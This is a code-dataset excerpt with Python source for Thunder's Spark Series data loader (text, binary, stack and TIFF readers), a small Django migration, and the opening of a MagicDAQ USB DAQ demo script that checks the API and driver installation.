raise ValueError("Inconsistent array dtypes: first array had dtype %s, but other array has dtype %s" %
(str(dtype), str(ary.dtype)))
# get indices so that fastest index changes first
shapeiters = (xrange(n) for n in shape)
keys = [idx[::-1] for idx in itertools.product(*shapeiters)]
values = vstack([ary.ravel() for ary in arrays]).T
dims = Dimensions.fromTuple(shape[::-1])
return Series(self.sc.parallelize(zip(keys, values), self.minPartitions), dims=dims, dtype=str(dtype))
@staticmethod
def __normalizeDatafilePattern(dataPath, ext):
dataPath = appendExtensionToPathSpec(dataPath, ext)
# we do need to prepend a scheme here, b/c otherwise the Hadoop based readers
# will adopt their default behavior and start looking on hdfs://.
parseResult = urlparse.urlparse(dataPath)
if parseResult.scheme:
# this appears to already be a fully-qualified URI
return dataPath
else:
# this looks like a local path spec
# check whether we look like an absolute or a relative path
import os
dirComponent, fileComponent = os.path.split(dataPath)
if not os.path.isabs(dirComponent):
# need to make relative local paths absolute; our file scheme parsing isn't all that it could be.
dirComponent = os.path.abspath(dirComponent)
dataPath = os.path.join(dirComponent, fileComponent)
return "file://" + dataPath
def fromText(self, dataPath, nkeys=None, ext="txt", dtype='float64'):
"""
Loads Series data from text files.
Parameters
----------
dataPath : string
Specifies the file or files to be loaded. dataPath may be either a URI (with scheme specified) or a path
on the local filesystem.
If a path is passed (determined by the absence of a scheme component when attempting to parse as a URI),
and it is not already a wildcard expression and does not end in <ext>, then it will be converted into a
wildcard pattern by appending '/*.ext'. This conversion can be avoided by passing a "file://" URI.
dtype: dtype or dtype specifier, default 'float64'
"""
dataPath = self.__normalizeDatafilePattern(dataPath, ext)
def parse(line, nkeys_):
vec = [float(x) for x in line.split(' ')]
ts = array(vec[nkeys_:], dtype=dtype)
keys = tuple(int(x) for x in vec[:nkeys_])
return keys, ts
lines = self.sc.textFile(dataPath, self.minPartitions)
data = lines.map(lambda x: parse(x, nkeys))
return Series(data, dtype=str(dtype))
# keytype, valuetype here violate camelCasing convention for consistence with JSON conf file format
BinaryLoadParameters = namedtuple('BinaryLoadParameters', 'nkeys nvalues keytype valuetype')
BinaryLoadParameters.__new__.__defaults__ = (None, None, 'int16', 'int16')
def __loadParametersAndDefaults(self, dataPath, confFilename, nkeys, nvalues, keyType, valueType):
"""Collects parameters to use for binary series loading.
Priority order is as follows:
1. parameters specified as keyword arguments;
2. parameters specified in a conf.json file on the local filesystem;
3. default parameters
Returns
-------
BinaryLoadParameters instance
"""
params = self.loadConf(dataPath, confFilename=confFilename)
# filter dict to include only recognized field names:
for k in params.keys():
if k not in SeriesLoader.BinaryLoadParameters._fields:
del params[k]
keywordParams = {'nkeys': nkeys, 'nvalues': nvalues, 'keytype': keyType, 'valuetype': valueType}
for k, v in keywordParams.items():
if not v:
del keywordParams[k]
params.update(keywordParams)
return SeriesLoader.BinaryLoadParameters(**params)
@staticmethod
def __checkBinaryParametersAreSpecified(paramsObj):
"""Throws ValueError if any of the field values in the passed namedtuple instance evaluate to False.
Note this is okay only so long as zero is not a valid parameter value. Hmm.
"""
missing = []
for paramName, paramVal in paramsObj._asdict().iteritems():
if not paramVal:
missing.append(paramName)
if missing:
raise ValueError("Missing parameters to load binary series files - " +
"these must be given either as arguments or in a configuration file: " +
str(tuple(missing)))
def fromBinary(self, dataPath, ext='bin', confFilename='conf.json',
nkeys=None, nvalues=None, keyType=None, valueType=None,
newDtype='smallfloat', casting='safe', maxPartitionSize='32mb'):
"""
Load a Series object from a directory of binary files.
Parameters
----------
dataPath : string URI or local filesystem path
Specifies the directory or files to be loaded. May be formatted as a URI string with scheme (e.g. "file://",
"s3n://", or "gs://"). If no scheme is present, will be interpreted as a path on the local filesystem. This path
must be valid on all workers. Datafile may also refer to a single file, or to a range of files specified
by a glob-style expression using a single wildcard character '*'.
newDtype : dtype or dtype specifier or string 'smallfloat' or None, optional, default 'smallfloat'
Numpy dtype of output series data. Most methods expect Series data to be floating-point. Input data will be
cast to the requested `newdtype` if not None - see Data `astype()` method.
casting : 'no'|'equiv'|'safe'|'same_kind'|'unsafe', optional, default 'safe'
Casting method to pass on to numpy's `astype()` method; see numpy documentation for details.
maxPartitionSize : str, optional, default = '32mb'
Maximum size of partitions as Java-style memory, will indirectly control the number of partitions
"""
paramsObj = self.__loadParametersAndDefaults(dataPath, confFilename, nkeys, nvalues, keyType, valueType)
self.__checkBinaryParametersAreSpecified(paramsObj)
dataPath = self.__normalizeDatafilePattern(dataPath, ext)
keyDtype = dtypeFunc(paramsObj.keytype)
valDtype = dtypeFunc(paramsObj.valuetype)
keySize = paramsObj.nkeys * keyDtype.itemsize
recordSize = keySize + paramsObj.nvalues * valDtype.itemsize
from thunder.utils.common import parseMemoryString
if isinstance(maxPartitionSize, basestring):
size = parseMemoryString(maxPartitionSize)
else:
raise Exception("Invalid size specification")
hadoopConf = {'recordLength': str(recordSize), 'mapred.max.split.size': str(size)}
lines = self.sc.newAPIHadoopFile(dataPath, 'thunder.util.io.hadoop.FixedLengthBinaryInputFormat',
'org.apache.hadoop.io.LongWritable',
'org.apache.hadoop.io.BytesWritable',
conf=hadoopConf)
data = lines.map(lambda (_, v):
(tuple(int(x) for x in frombuffer(buffer(v, 0, keySize), dtype=keyDtype)),
frombuffer(buffer(v, keySize), dtype=valDtype)))
return Series(data, dtype=str(valDtype), index=arange(paramsObj.nvalues)).astype(newDtype, casting)
def _getSeriesBlocksFromStack(self, dataPath, dims, ext="stack", blockSize="150M", dtype='int16',
newDtype='smallfloat', casting='safe', startIdx=None, stopIdx=None, recursive=False):
"""Create an RDD of <string blocklabel, (int k-tuple indices, array of datatype values)>
Parameters
----------
dataPath: string URI or local filesystem path
Specifies the directory or files to be loaded. May be formatted as a URI string with scheme (e.g. "file://",
"s3n://" or "gs://"). If no scheme is present, will be interpreted as a path on the local filesystem. This path
must be valid on all workers. Datafile may also refer to a single file, or to a range of files specified
by a glob-style expression using a single wildcard character '*'.
dims: tuple of positive int
Dimensions of input image data, ordered with the fastest-changing dimension first.
dtype: dtype or dtype specifier, optional, default 'int16'
Numpy dtype of input stack data
newDtype: floating-point dtype or dtype specifier or string 'smallfloat' or None, optional, default 'smallfloat'
Numpy dtype of output series data. Series data must be floating-point. Input data will be cast to the
requested `newdtype` - see numpy `astype()` method.
casting: 'no'|'equiv'|'safe'|'same_kind'|'unsafe', optional, default 'safe'
Casting method to pass on to numpy's `astype()` method; see numpy documentation for details.
recursive: boolean, default False
If true, will recursively descend directories rooted at dataPath, loading all files in the tree that
have an extension matching 'ext'. Recursive loading is currently only implemented for local filesystems
(not s3).
Returns
---------
pair of (RDD, ntimepoints)
RDD: sequence of keys, values pairs
(call using flatMap)
RDD Key: tuple of int
zero-based indicies of position within original image volume
RDD Value: numpy array of datatype
series of values at position across loaded image volumes
ntimepoints: int
number of time points in returned series, determined from number of stack files found at dataPath
newDtype: string
string representation of numpy data type of returned blocks
"""
dataPath = self.__normalizeDatafilePattern(dataPath, ext)
blockSize = parseMemoryString(blockSize)
totalDim = reduce(lambda x_, y_: x_*y_, dims)
dtype = dtypeFunc(dtype)
if newDtype is None or newDtype == '':
newDtype = str(dtype)
elif newDtype == 'smallfloat':
newDtype = str(smallestFloatType(dtype))
else:
newDtype = str(newDtype)
reader = getFileReaderForPath(dataPath)(awsCredentialsOverride=self.awsCredentialsOverride)
filenames = reader.list(dataPath, startIdx=startIdx, stopIdx=stopIdx, recursive=recursive)
if not filenames:
raise IOError("No files found for path '%s'" % dataPath)
dataSize = totalDim * len(filenames) * dtype.itemsize
nblocks = max(dataSize / blockSize, 1) # integer division
if len(dims) >= 3:
# for 3D stacks, do calculations to ensure that
# different planes appear in distinct files
blocksPerPlane = max(nblocks / dims[-1], 1)
pixPerPlane = reduce(lambda x_, y_: x_*y_, dims[:-1]) # all but last dimension
# get the greatest number of blocks in a plane (up to as many as requested) that still divide the plane
# evenly. This will always be at least one.
kUpdated = [x for x in range(1, blocksPerPlane+1) if not pixPerPlane % x][-1]
nblocks = kUpdated * dims[-1]
blockSizePerStack = (totalDim / nblocks) * dtype.itemsize
else:
# otherwise just round to make contents divide into nearly even blocks
blockSizePerStack = int(math.ceil(totalDim / float(nblocks)))
nblocks = int(math.ceil(totalDim / float(blockSizePerStack)))
blockSizePerStack *= dtype.itemsize
fileSize = totalDim * dtype.itemsize
def readBlock(blockNum):
# copy size out from closure; will modify later:
blockSizePerStack_ = blockSizePerStack
# get start position for this block
position = blockNum * blockSizePerStack_
# adjust if at end of file
if (position + blockSizePerStack_) > fileSize:
blockSizePerStack_ = int(fileSize - position)
# loop over files, loading one block from each
bufs = []
for fname in filenames:
buf = reader.read(fname, startOffset=position, size=blockSizePerStack_)
bufs.append(frombuffer(buf, dtype=dtype))
buf = vstack(bufs).T # dimensions are now linindex x time (images)
del bufs
buf = buf.astype(newDtype, casting=casting, copy=False)
# append subscript keys based on dimensions
itemPosition = position / dtype.itemsize
itemBlocksize = blockSizePerStack_ / dtype.itemsize
linearIdx = arange(itemPosition, itemPosition + itemBlocksize) # zero-based
keys = zip(*map(tuple, unravel_index(linearIdx, dims, order='F')))
return zip(keys, buf)
# map over blocks
return (self.sc.parallelize(range(0, nblocks), nblocks).flatMap(lambda bn: readBlock(bn)),
len(filenames), newDtype)
@staticmethod
def __readMetadataFromFirstPageOfMultiTif(reader, filePath):
import thunder.rdds.fileio.multitif as multitif
# read first page of first file to get expected image size
tiffFP = reader.open(filePath)
tiffParser = multitif.TiffParser(tiffFP, debug=False)
tiffHeaders = multitif.TiffData()
tiffParser.parseFileHeader(destinationTiff=tiffHeaders)
firstIfd = tiffParser.parseNextImageFileDirectory(destinationTiff=tiffHeaders)
if not firstIfd.isLuminanceImage():
raise ValueError(("File %s does not appear to be a luminance " % filePath) +
"(greyscale or bilevel) TIF image, " +
"which are the only types currently supported")
# keep reading pages until we reach the end of the file, in order to get number of planes:
while tiffParser.parseNextImageFileDirectory(destinationTiff=tiffHeaders):
pass
# get dimensions
npages = len(tiffHeaders.ifds)
height = firstIfd.getImageHeight()
width = firstIfd.getImageWidth()
# get datatype
bitsPerSample = firstIfd.getBitsPerSample()
if not (bitsPerSample in (8, 16, 32, 64)):
raise ValueError("Only 8, 16, 32, or 64 bit per pixel TIF images are supported, got %d" % bitsPerSample)
sampleFormat = firstIfd.getSampleFormat()
if sampleFormat == multitif.SAMPLE_FORMAT_UINT:
dtStr = 'uint'
elif sampleFormat == multitif.SAMPLE_FORMAT_INT:
dtStr = 'int'
elif sampleFormat == multitif.SAMPLE_FORMAT_FLOAT:
dtStr = 'float'
else:
raise ValueError("Unknown TIF SampleFormat tag value %d, should be 1, 2, or 3 for uint, int, or float"
% sampleFormat)
dtype = dtStr+str(bitsPerSample)
return height, width, npages, dtype
def _getSeriesBlocksFromMultiTif(self, dataPath, ext="tif", blockSize="150M",
newDtype='smallfloat', casting='safe', startIdx=None, stopIdx=None,
recursive=False):
import thunder.rdds.fileio.multitif as multitif
import itertools
from PIL import Image
import io
dataPath = self.__normalizeDatafilePattern(dataPath, ext)
blockSize = parseMemoryString(blockSize)
reader = getFileReaderForPath(dataPath)(awsCredentialsOverride=self.awsCredentialsOverride)
filenames = reader.list(dataPath, startIdx=startIdx, stopIdx=stopIdx, recursive=recursive)
if not filenames:
raise IOError("No files found for path '%s'" % dataPath)
ntimepoints = len(filenames)
doMinimizeReads = dataPath.lower().startswith("s3") or dataPath.lower().startswith("gs")
# check PIL version to see whether it is actually pillow or indeed old PIL and choose
# conversion function appropriately. See ImagesLoader.fromMultipageTif and common.pil_to_array
# for more explanation.
isPillow = hasattr(Image, "PILLOW_VERSION")
if isPillow:
conversionFcn = array # use numpy's array() function
else:
from thunder.utils.common import pil_to_array
conversionFcn = pil_to_array # use our modified version of matplotlib's pil_to_array
height, width, npages, dtype = SeriesLoader.__readMetadataFromFirstPageOfMultiTif(reader, filenames[0])
if dtype.startswith('int'):
raise ValueError('Signed integer tiff images are not supported in SeriesLoader (shuffle=False);' +
' please try loading as Images (shuffle=True)')
pixelBytesize = dtypeFunc(dtype).itemsize
if newDtype is None or str(newDtype) == '':
newDtype = str(dtype)
elif newDtype == 'smallfloat':
newDtype = str(smallestFloatType(dtype))
else:
newDtype = str(newDtype)
# intialize at one block per plane
bytesPerPlane = height * width * pixelBytesize * ntimepoints
bytesPerBlock = bytesPerPlane
blocksPerPlane = 1
# keep dividing while cutting our size in half still leaves us bigger than the requested size
# should end up no more than 2x blockSize.
while bytesPerBlock >= blockSize * 2:
bytesPerBlock /= 2
blocksPerPlane *= 2
blocklenPixels = max((height * width) / blocksPerPlane, 1) # integer division
while blocksPerPlane * blocklenPixels < height * width: # make sure we're reading the plane fully
blocksPerPlane += 1
# prevent bringing in self in closure:
awsCredentialsOverride = self.awsCredentialsOverride
# keys will be planeidx, blockidx:
keys = list(itertools.product(xrange(npages), xrange(blocksPerPlane)))
def readBlockFromTiff(planeIdxBlockIdx):
planeIdx, blockIdx = planeIdxBlockIdx
blocks = []
planeShape = None
blockStart = None
blockEnd = None
for fname in filenames:
reader_ = getFileReaderForPath(fname)(awsCredentialsOverride=awsCredentialsOverride)
fp = reader_.open(fname)
try:
if doMinimizeReads:
# use multitif module to generate a fake, in-memory
# one-page tif file. the advantage of this is that it
# cuts way down on the many small reads that PIL/pillow
# will make otherwise, which would be a problem for s3
# or Google Storage
tiffParser_ = multitif.TiffParser(fp, debug=False)
tiffFilebuffer = multitif.packSinglePage(tiffParser_, pageIdx=planeIdx)
byteBuf = io.BytesIO(tiffFilebuffer)
try:
pilImg = Image.open(byteBuf)
ary = conversionFcn(pilImg).T
finally:
byteBuf.close()
del tiffFilebuffer, tiffParser_, pilImg, byteBuf
else:
# read tif using PIL directly
pilImg = Image.open(fp)
pilImg.seek(planeIdx)
ary = conversionFcn(pilImg).T
del pilImg
if not planeShape:
planeShape = ary.shape[:]
blockStart = blockIdx * blocklenPixels
blockEnd = min(blockStart+blocklenPixels, planeShape[0]*planeShape[1])
blocks.append(ary.ravel(order='C')[blockStart:blockEnd])
del ary
finally:
fp.close()
buf = vstack(blocks).T # dimensions are now linindex x time (images)
del blocks
buf = buf.astype(newDtype, casting=casting, copy=False)
# append subscript keys based on dimensions
linearIdx = arange(blockStart, blockEnd) # zero-based
seriesKeys = zip(*map(tuple, unravel_index(linearIdx, planeShape, order='C')))
# add plane index to end of keys
if npages > 1:
seriesKeys = [tuple(list(keys_)[::-1]+[planeIdx]) for keys_ in seriesKeys]
else:
seriesKeys = [tuple(list(keys_)[::-1]) for keys_ in seriesKeys]
return zip(seriesKeys, buf)
# map over blocks
rdd = self.sc.parallelize(keys, len(keys)).flatMap(readBlockFromTiff)
if npages > 1:
dims = (npages, width, height)
else:
dims = (width, height)
metadata = (dims, ntimepoints, newDtype)
return rdd, metadata
def fromStack(self, dataPath, dims, ext="stack", blockSize="150M", dtype='int16',
newDtype='smallfloat', casting='safe', startIdx=None, stopIdx=None, recursive=False):
"""Load a Series object directly from binary image stack files.
Parameters
----------
dataPath: string
Path to data files or directory, specified as either a local filesystem path or in a URI-like format,
including scheme. A dataPath argument may include a single '*' wildcard character in the filename.
dims: tuple of positive int
Dimensions of input image data, ordered with the fastest-changing dimension first.
ext: string, optional, default "stack"
Extension required on data files to be loaded.
blockSize: string formatted as e.g. "64M", "512k", "2G", or positive int. optional, default "150M"
Requested size of Series partitions in bytes (or kilobytes, megabytes, gigabytes).
dtype: dtype or dtype specifier, optional, default 'int16'
Numpy dtype of input stack data
newDtype: dtype or dtype specifier or string 'smallfloat' or None, optional, default 'smallfloat'
Numpy dtype of output series data. Most methods expect Series data to be floating-point. Input data will be
cast to the requested `newdtype` if not None - see Data `astype()` method.
casting: 'no'|'equiv'|'safe'|'same_kind'|'unsafe', optional, default 'safe'
Casting method to pass on to numpy's `astype()` method; see numpy documentation for details.
startIdx, stopIdx: nonnegative int. optional.
Indices of the first and last-plus-one data file to load, relative to the sorted filenames matching
`dataPath` and `ext`. Interpreted according to python slice indexing conventions.
recursive: boolean, default False
If true, will recursively descend directories rooted at dataPath, loading all files in the tree that
have an extension matching 'ext'. Recursive loading is currently only implemented for local filesystems
(not s3).
"""
seriesBlocks, npointsInSeries, newDtype = \
self._getSeriesBlocksFromStack(dataPath, dims, ext=ext, blockSize=blockSize, dtype=dtype,
newDtype=newDtype, casting=casting, startIdx=startIdx, stopIdx=stopIdx,
recursive=recursive)
return Series(seriesBlocks, dims=dims, dtype=newDtype, index=arange(npointsInSeries))
def fromTif(self, dataPath, ext="tif", blockSize="150M", newDtype='smallfloat', casting='safe',
startIdx=None, stopIdx=None, recursive=False):
"""Load a Series object from multipage tiff files.
Parameters
----------
dataPath: string
Path to data files or directory, specified as either a local filesystem path or in a URI-like format,
including scheme. A dataPath argument may include a single '*' wildcard character in the filename.
ext: string, optional, default "tif"
Extension required on data files to be loaded.
blockSize: string formatted as e.g. "64M", "512k", "2G", or positive int. optional, default "150M"
Requested size of Series partitions in bytes (or kilobytes, megabytes, gigabytes).
newDtype: dtype or dtype specifier or string 'smallfloat' or None, optional, default 'smallfloat'
Numpy dtype of output series data. Most methods expect Series data to be floating-point. Input data will be
cast to the requested `newdtype` if not None - see Data `astype()` method.
casting: 'no'|'equiv'|'safe'|'same_kind'|'unsafe', optional, default 'safe'
Casting method to pass on to numpy's `astype()` method; see numpy documentation for details.
startIdx, stopIdx: nonnegative int. optional.
Indices of the first and last-plus-one data file to load, relative to the sorted filenames matching
`dataPath` and `ext`. Interpreted according to python slice indexing conventions.
recursive: boolean, default False
If true, will recursively descend directories rooted at dataPath, loading all files in the tree that
have an extension matching 'ext'. Recursive loading is currently only implemented for local filesystems
(not s3).
"""
seriesBlocks, metadata = self._getSeriesBlocksFromMultiTif(dataPath, ext=ext, blockSize=blockSize,
newDtype=newDtype, casting=casting,
startIdx=startIdx, stopIdx=stopIdx,
recursive=recursive)
dims, npointsInSeries, dtype = metadata
return Series(seriesBlocks, dims=Dimensions.fromTuple(dims[::-1]), dtype=dtype,
index=arange(npointsInSeries))
def __saveSeriesRdd(self, seriesBlocks, outputDirPath, dims, npointsInSeries, dtype, overwrite=False):
if not overwrite:
self._checkOverwrite(outputDirPath)
overwrite = True # prevent additional downstream checks for this path
writer = getParallelWriterForPath(outputDirPath)(outputDirPath, overwrite=overwrite,
awsCredentialsOverride=self.awsCredentialsOverride)
def blockToBinarySeries(kvIter):
label = None
keyPacker = None
buf = StringIO()
for seriesKey, series in kvIter:
if keyPacker is None:
keyPacker = struct.Struct('h'*len(seriesKey))
label = SimpleBlocks.getBinarySeriesNameForKey(seriesKey) + ".bin"
buf.write(keyPacker.pack(*seriesKey))
buf.write(series.tostring())
val = buf.getvalue()
buf.close()
return [(label, val)]
seriesBlocks.mapPartitions(blockToBinarySeries).foreach(writer.writerFcn)
writeSeriesConfig(outputDirPath, len(dims), npointsInSeries, valueType=dtype, overwrite=overwrite,
awsCredentialsOverride=self.awsCredentialsOverride)
def saveFromStack(self, dataPath, outputDirPath, dims, ext="stack", blockSize="150M", dtype='int16',
newDtype=None, casting='safe', startIdx=None, stopIdx=None, overwrite=False, recursive=False):
"""Write out data from binary image stack files in the Series data flat binary format.
Parameters
----------
dataPath: string
Path to data files or directory, specified as either a local filesystem path or in a URI-like format,
including scheme. A dataPath argument may include a single '*' wildcard character in the filename.
outputDirPath: string
Path to a directory into which to write Series file output. An outputdir argument may be either a path
on the local file system or a URI-like format, as in dataPath.
dims: tuple of positive int
Dimensions of input image data, ordered with the fastest-changing dimension first.
ext: string, optional, default "stack"
Extension required on data files to be loaded.
blockSize: string formatted as e.g. "64M", "512k", "2G", or positive int. optional, default "150M"
Requested size of Series partitions in bytes (or kilobytes, megabytes, gigabytes).
dtype: dtype or dtype specifier, optional, default 'int16'
Numpy dtype of input stack data
newDtype: floating-point dtype or dtype specifier or string 'smallfloat' or None, optional, default None
Numpy dtype of output series binary data. Input data will be cast to the requested `newdtype` if not None
- see Data `astype()` method.
casting: 'no'|'equiv'|'safe'|'same_kind'|'unsafe', optional, default 'safe'
Casting method to pass on to numpy's `astype()` method; see numpy documentation for details.
startIdx, stopIdx: nonnegative int. optional.
Indices of the first and last-plus-one data file to load, relative to the sorted filenames matching
`dataPath` and `ext`. Interpreted according to python slice indexing conventions.
overwrite: boolean, optional, default False
If true, the directory specified by outputdirpath will first be deleted, along with all its contents, if it
already exists. If false, a ValueError will be thrown if outputdirpath is found to already exist.
"""
if not overwrite:
self._checkOverwrite(outputDirPath)
overwrite = True # prevent additional downstream checks for this path
seriesBlocks, npointsInSeries, newDtype = \
self._getSeriesBlocksFromStack(dataPath, dims, ext=ext, blockSize=blockSize, dtype=dtype,
newDtype=newDtype, casting=casting, startIdx=startIdx, stopIdx=stopIdx,
recursive=recursive)
self.__saveSeriesRdd(seriesBlocks, outputDirPath, dims, npointsInSeries, newDtype, overwrite=overwrite)
def saveFromTif(self, dataPath, outputDirPath, ext="tif", blockSize="150M",
newDtype=None, casting='safe', startIdx=None, stopIdx=None,
overwrite=False, recursive=False):
"""Write out data from multipage tif files in the Series data flat binary format.
Parameters
----------
dataPath: string
Path to data files or directory, specified as either a local filesystem path or in a URI-like format,
including scheme. A dataPath argument may include a single '*' wildcard character in the filename.
outputDirPpath: string
Path to a directory into which to write Series file output. An outputdir argument may be either a path
on the local file system or a URI-like format, as in dataPath.
ext: string, optional, default "stack"
Extension required on data files to be loaded.
blockSize: string formatted as e.g. "64M", "512k", "2G", or positive int. optional, default "150M"
Requested size of Series partitions in bytes (or kilobytes, megabytes, gigabytes).
newDtype: floating-point dtype or dtype specifier or string 'smallfloat' or None, optional, default None
Numpy dtype of output series binary data. Input data will be cast to the requested `newdtype` if not None
- see Data `astype()` method.
casting: 'no'|'equiv'|'safe'|'same_kind'|'unsafe', optional, default 'safe'
Casting method to pass on to numpy's `astype()` method; see numpy documentation for details.
startIdx, stopIdx: nonnegative int. optional.
Indices of the first and last-plus-one data file to load, relative to the sorted filenames matching
`dataPath` and `ext`. Interpreted according to python slice indexing conventions.
overwrite: boolean, optional, default False
If true, the directory specified by outputdirpath will first be deleted, along with all its contents, if it
already exists. If false, a ValueError will be thrown if outputdirpath is found to already exist.
"""
if not overwrite:
self._checkOverwrite(outputDirPath)
overwrite = True # prevent additional downstream checks for this path
seriesBlocks, metadata = self._getSeriesBlocksFromMultiTif(dataPath, ext=ext, blockSize=blockSize,
newDtype=newDtype, casting=casting,
startIdx=startIdx, stopIdx=stopIdx,
recursive=recursive)
dims, npointsInSeries, dtype = metadata
self.__saveSeriesRdd(seriesBlocks, outputDirPath, dims, npointsInSeries, dtype, overwrite=overwrite)
def fromMatLocal(self, dataPath, varName, keyFile=None):
"""Loads Series data stored in a Matlab .mat file.
`datafile` must refer to a path visible to all workers, such as on NFS or similar mounted shared filesystem.
"""
data = loadmat(dataPath)[varName]
if data.ndim > 2:
raise IOError('Input data must be one or two dimensional')
if keyFile:
keys = map(lambda x: tuple(x), loadmat(keyFile)['keys'])
else:
keys = arange(0, data.shape[0])
rdd = Series(self.sc.parallelize(zip(keys, data), self.minPartitions), dtype=str(data.dtype))
return rdd
def fromNpyLocal(self, dataPath, keyFile=None):
"""Loads Series data stored in the numpy save() .npy format.
`datafile` must refer to a path visible to all workers, such as on NFS or similar mounted shared filesystem.
"""
data = load(dataPath)
if data.ndim > 2:
raise IOError('Input data must be one or two dimensional')
if keyFile:
keys = map(lambda x: tuple(x), load(keyFile))
else:
keys = arange(0, data.shape[0])
rdd = Series(self.sc.parallelize(zip(keys, data), self.minPartitions), dtype=str(data.dtype))
return rdd
def loadConf(self, dataPath, confFilename='conf.json'):
"""Returns a dict loaded from a json file.
Looks for file named `conffile` in same directory as `dataPath`
Returns {} if file not found
"""
if not confFilename:
return {}
reader = getFileReaderForPath(dataPath)(awsCredentialsOverride=self.awsCredentialsOverride)
try:
jsonBuf = reader.read(dataPath, filename=confFilename)
except FileNotFoundError:
return {}
params = json.loads(jsonBuf)
if 'format' in params:
raise Exception("Numerical format of value should be specified as 'valuetype', not 'format'")
if 'keyformat' in params:
raise Exception("Numerical format of key should be specified as 'keytype', not 'keyformat'")
return params
def writeSeriesConfig(outputDirPath, nkeys, nvalues, keyType='int16', valueType='int16',
confFilename="conf.json", overwrite=True, awsCredentialsOverride=None):
"""
Helper function to write out a conf.json file with required information to load Series binary data.
"""
import json
from thunder.rdds.fileio.writers import getFileWriterForPath
filewriterClass = getFileWriterForPath(outputDirPath)
# write configuration file
# config JSON keys are lowercased "valuetype", "keytype", not valueType, keyType
conf = {'input': outputDirPath,
'nkeys': nkeys, 'nvalues': nvalues,
'valuetype': str(valueType), 'keytype': str(keyType)}
confWriter = filewriterClass(outputDirPath, confFilename, overwrite=overwrite,
awsCredentialsOverride=awsCredentialsOverride)
confWriter.writeFile(json.dumps(conf, indent=2))
# touch "SUCCESS" file as final action
successWriter = filewriterClass(outputDirPath, "SUCCESS", overwrite=overwrite,
awsCredentialsOverride=awsCredentialsOverride)
successWriter.writeFile('')
| 48.772619 | 124 | 0.631648 | 4,517 | 40,969 | 5.706221 | 0.166261 | 0.015131 | 0.004656 | 0.008147 | 0.483531 | 0.462347 | 0.431814 | 0.415364 | 0.405005 | 0.401979 | 0 | 0.00572 | 0.291611 | 40,969 | 839 | 125 | 48.830751 | 0.8824 | 0.068125 | 0 | 0.309582 | 0 | 0.002457 | 0.07226 | 0.005884 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.002457 | 0.068796 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c7dedb48cc1d235760b585e1ff0e7c005780aeec | 491 | py | Python | api/scheduler/migrations/0001_initial.py | jfaach/stock-app | 9cd0f98d3ec5d31dcd6680c5bf8b7b0fcdf025a6 | [
"CC0-1.0"
] | null | null | null | api/scheduler/migrations/0001_initial.py | jfaach/stock-app | 9cd0f98d3ec5d31dcd6680c5bf8b7b0fcdf025a6 | [
"CC0-1.0"
] | null | null | null | api/scheduler/migrations/0001_initial.py | jfaach/stock-app | 9cd0f98d3ec5d31dcd6680c5bf8b7b0fcdf025a6 | [
"CC0-1.0"
] | null | null | null | # Generated by Django 3.1.1 on 2020-12-16 03:07
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Scheduler',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('minutes', models.IntegerField(default=15)),
],
),
]
| 22.318182 | 114 | 0.578411 | 50 | 491 | 5.62 | 0.78 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.049563 | 0.301426 | 491 | 21 | 115 | 23.380952 | 0.769679 | 0.09165 | 0 | 0 | 1 | 0 | 0.045045 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.071429 | 0 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c7e2f163fdb11300c85e2c17e27cb56d8ee3f07e | 12,844 | py | Python | example_python_files/MagicDAQ,MABoard,FullDemo.py | MagicDAQ/magicdaq_docs | 896a2565a28d80c733d8a137211212816ef3fbe2 | [
"MIT"
] | 1 | 2021-05-20T21:11:13.000Z | 2021-05-20T21:11:13.000Z | example_python_files/MagicDAQ,MABoard,FullDemo.py | MagicDAQ/magicdaq_docs | 896a2565a28d80c733d8a137211212816ef3fbe2 | [
"MIT"
] | null | null | null | example_python_files/MagicDAQ,MABoard,FullDemo.py | MagicDAQ/magicdaq_docs | 896a2565a28d80c733d8a137211212816ef3fbe2 | [
"MIT"
] | null | null | null | ##############################################################
#*** MagicDAQ USB DAQ and M&A Board General Demo Script ***
##############################################################
#*** Websites ***
# MagicDAQ Website:
# https://www.magicdaq.com/
# API Docs Website:
# https://magicdaq.github.io/magicdaq_docs/
#*** Install MagicDAQ ***
# Download the MagicDAQ python package from pypi
# Run this command in a command prompt:
# python -m pip install magicdaq
# Further docs: https://magicdaq.github.io/magicdaq_docs/#/Install_MagicDAQ
# MagicDAQ is only compatible with Python 3 on Windows. It does not work on Linux at the moment. It does not work with Python 2.
#*** Using Auto Code Complete With PyCharm ***
# Using a code editor like Pycharm and want to get auto complete working for the MagicDAQ package?
# Docs: https://magicdaq.github.io/magicdaq_docs/#/PyCharmCodeCompletion
##############################################################
#*** Imports ***
##############################################################
import sys
import time
# Import MagicDAQ
print('*** MagicDAQ Install Check ***')
print('')
try:
# Import MagicDAQDevice object
from magicdaq.api_class import MagicDAQDevice
# Create daq_one object
daq_one = MagicDAQDevice()
print('GOOD: MagicDAQ API is installed properly.')
# Get MagicDAQ Driver Version
driver_version = daq_one.get_driver_version()
if driver_version == 1.0:
print('GOOD: MagicDAQ Driver is installed properly.')
print('You are ready to use MagicDAQ!')
else:
print('ERROR: MagicDAQ Driver version not expected value: '+str(driver_version))
print('Try installing MagicDAQ using pip again.')
print('https://magicdaq.github.io/magicdaq_docs/#/Install_MagicDAQ')
print('Feel free to email MagicDAQ Support at: support@magicdaq.com')
except Exception as exception_text:
print('Original exception: ')
print(exception_text)
print('')
print('ERROR: Unable to import MagicDAQ API.')
print('Mostly likely, MagicDAQ has not been properly downloaded and installed using pip.')
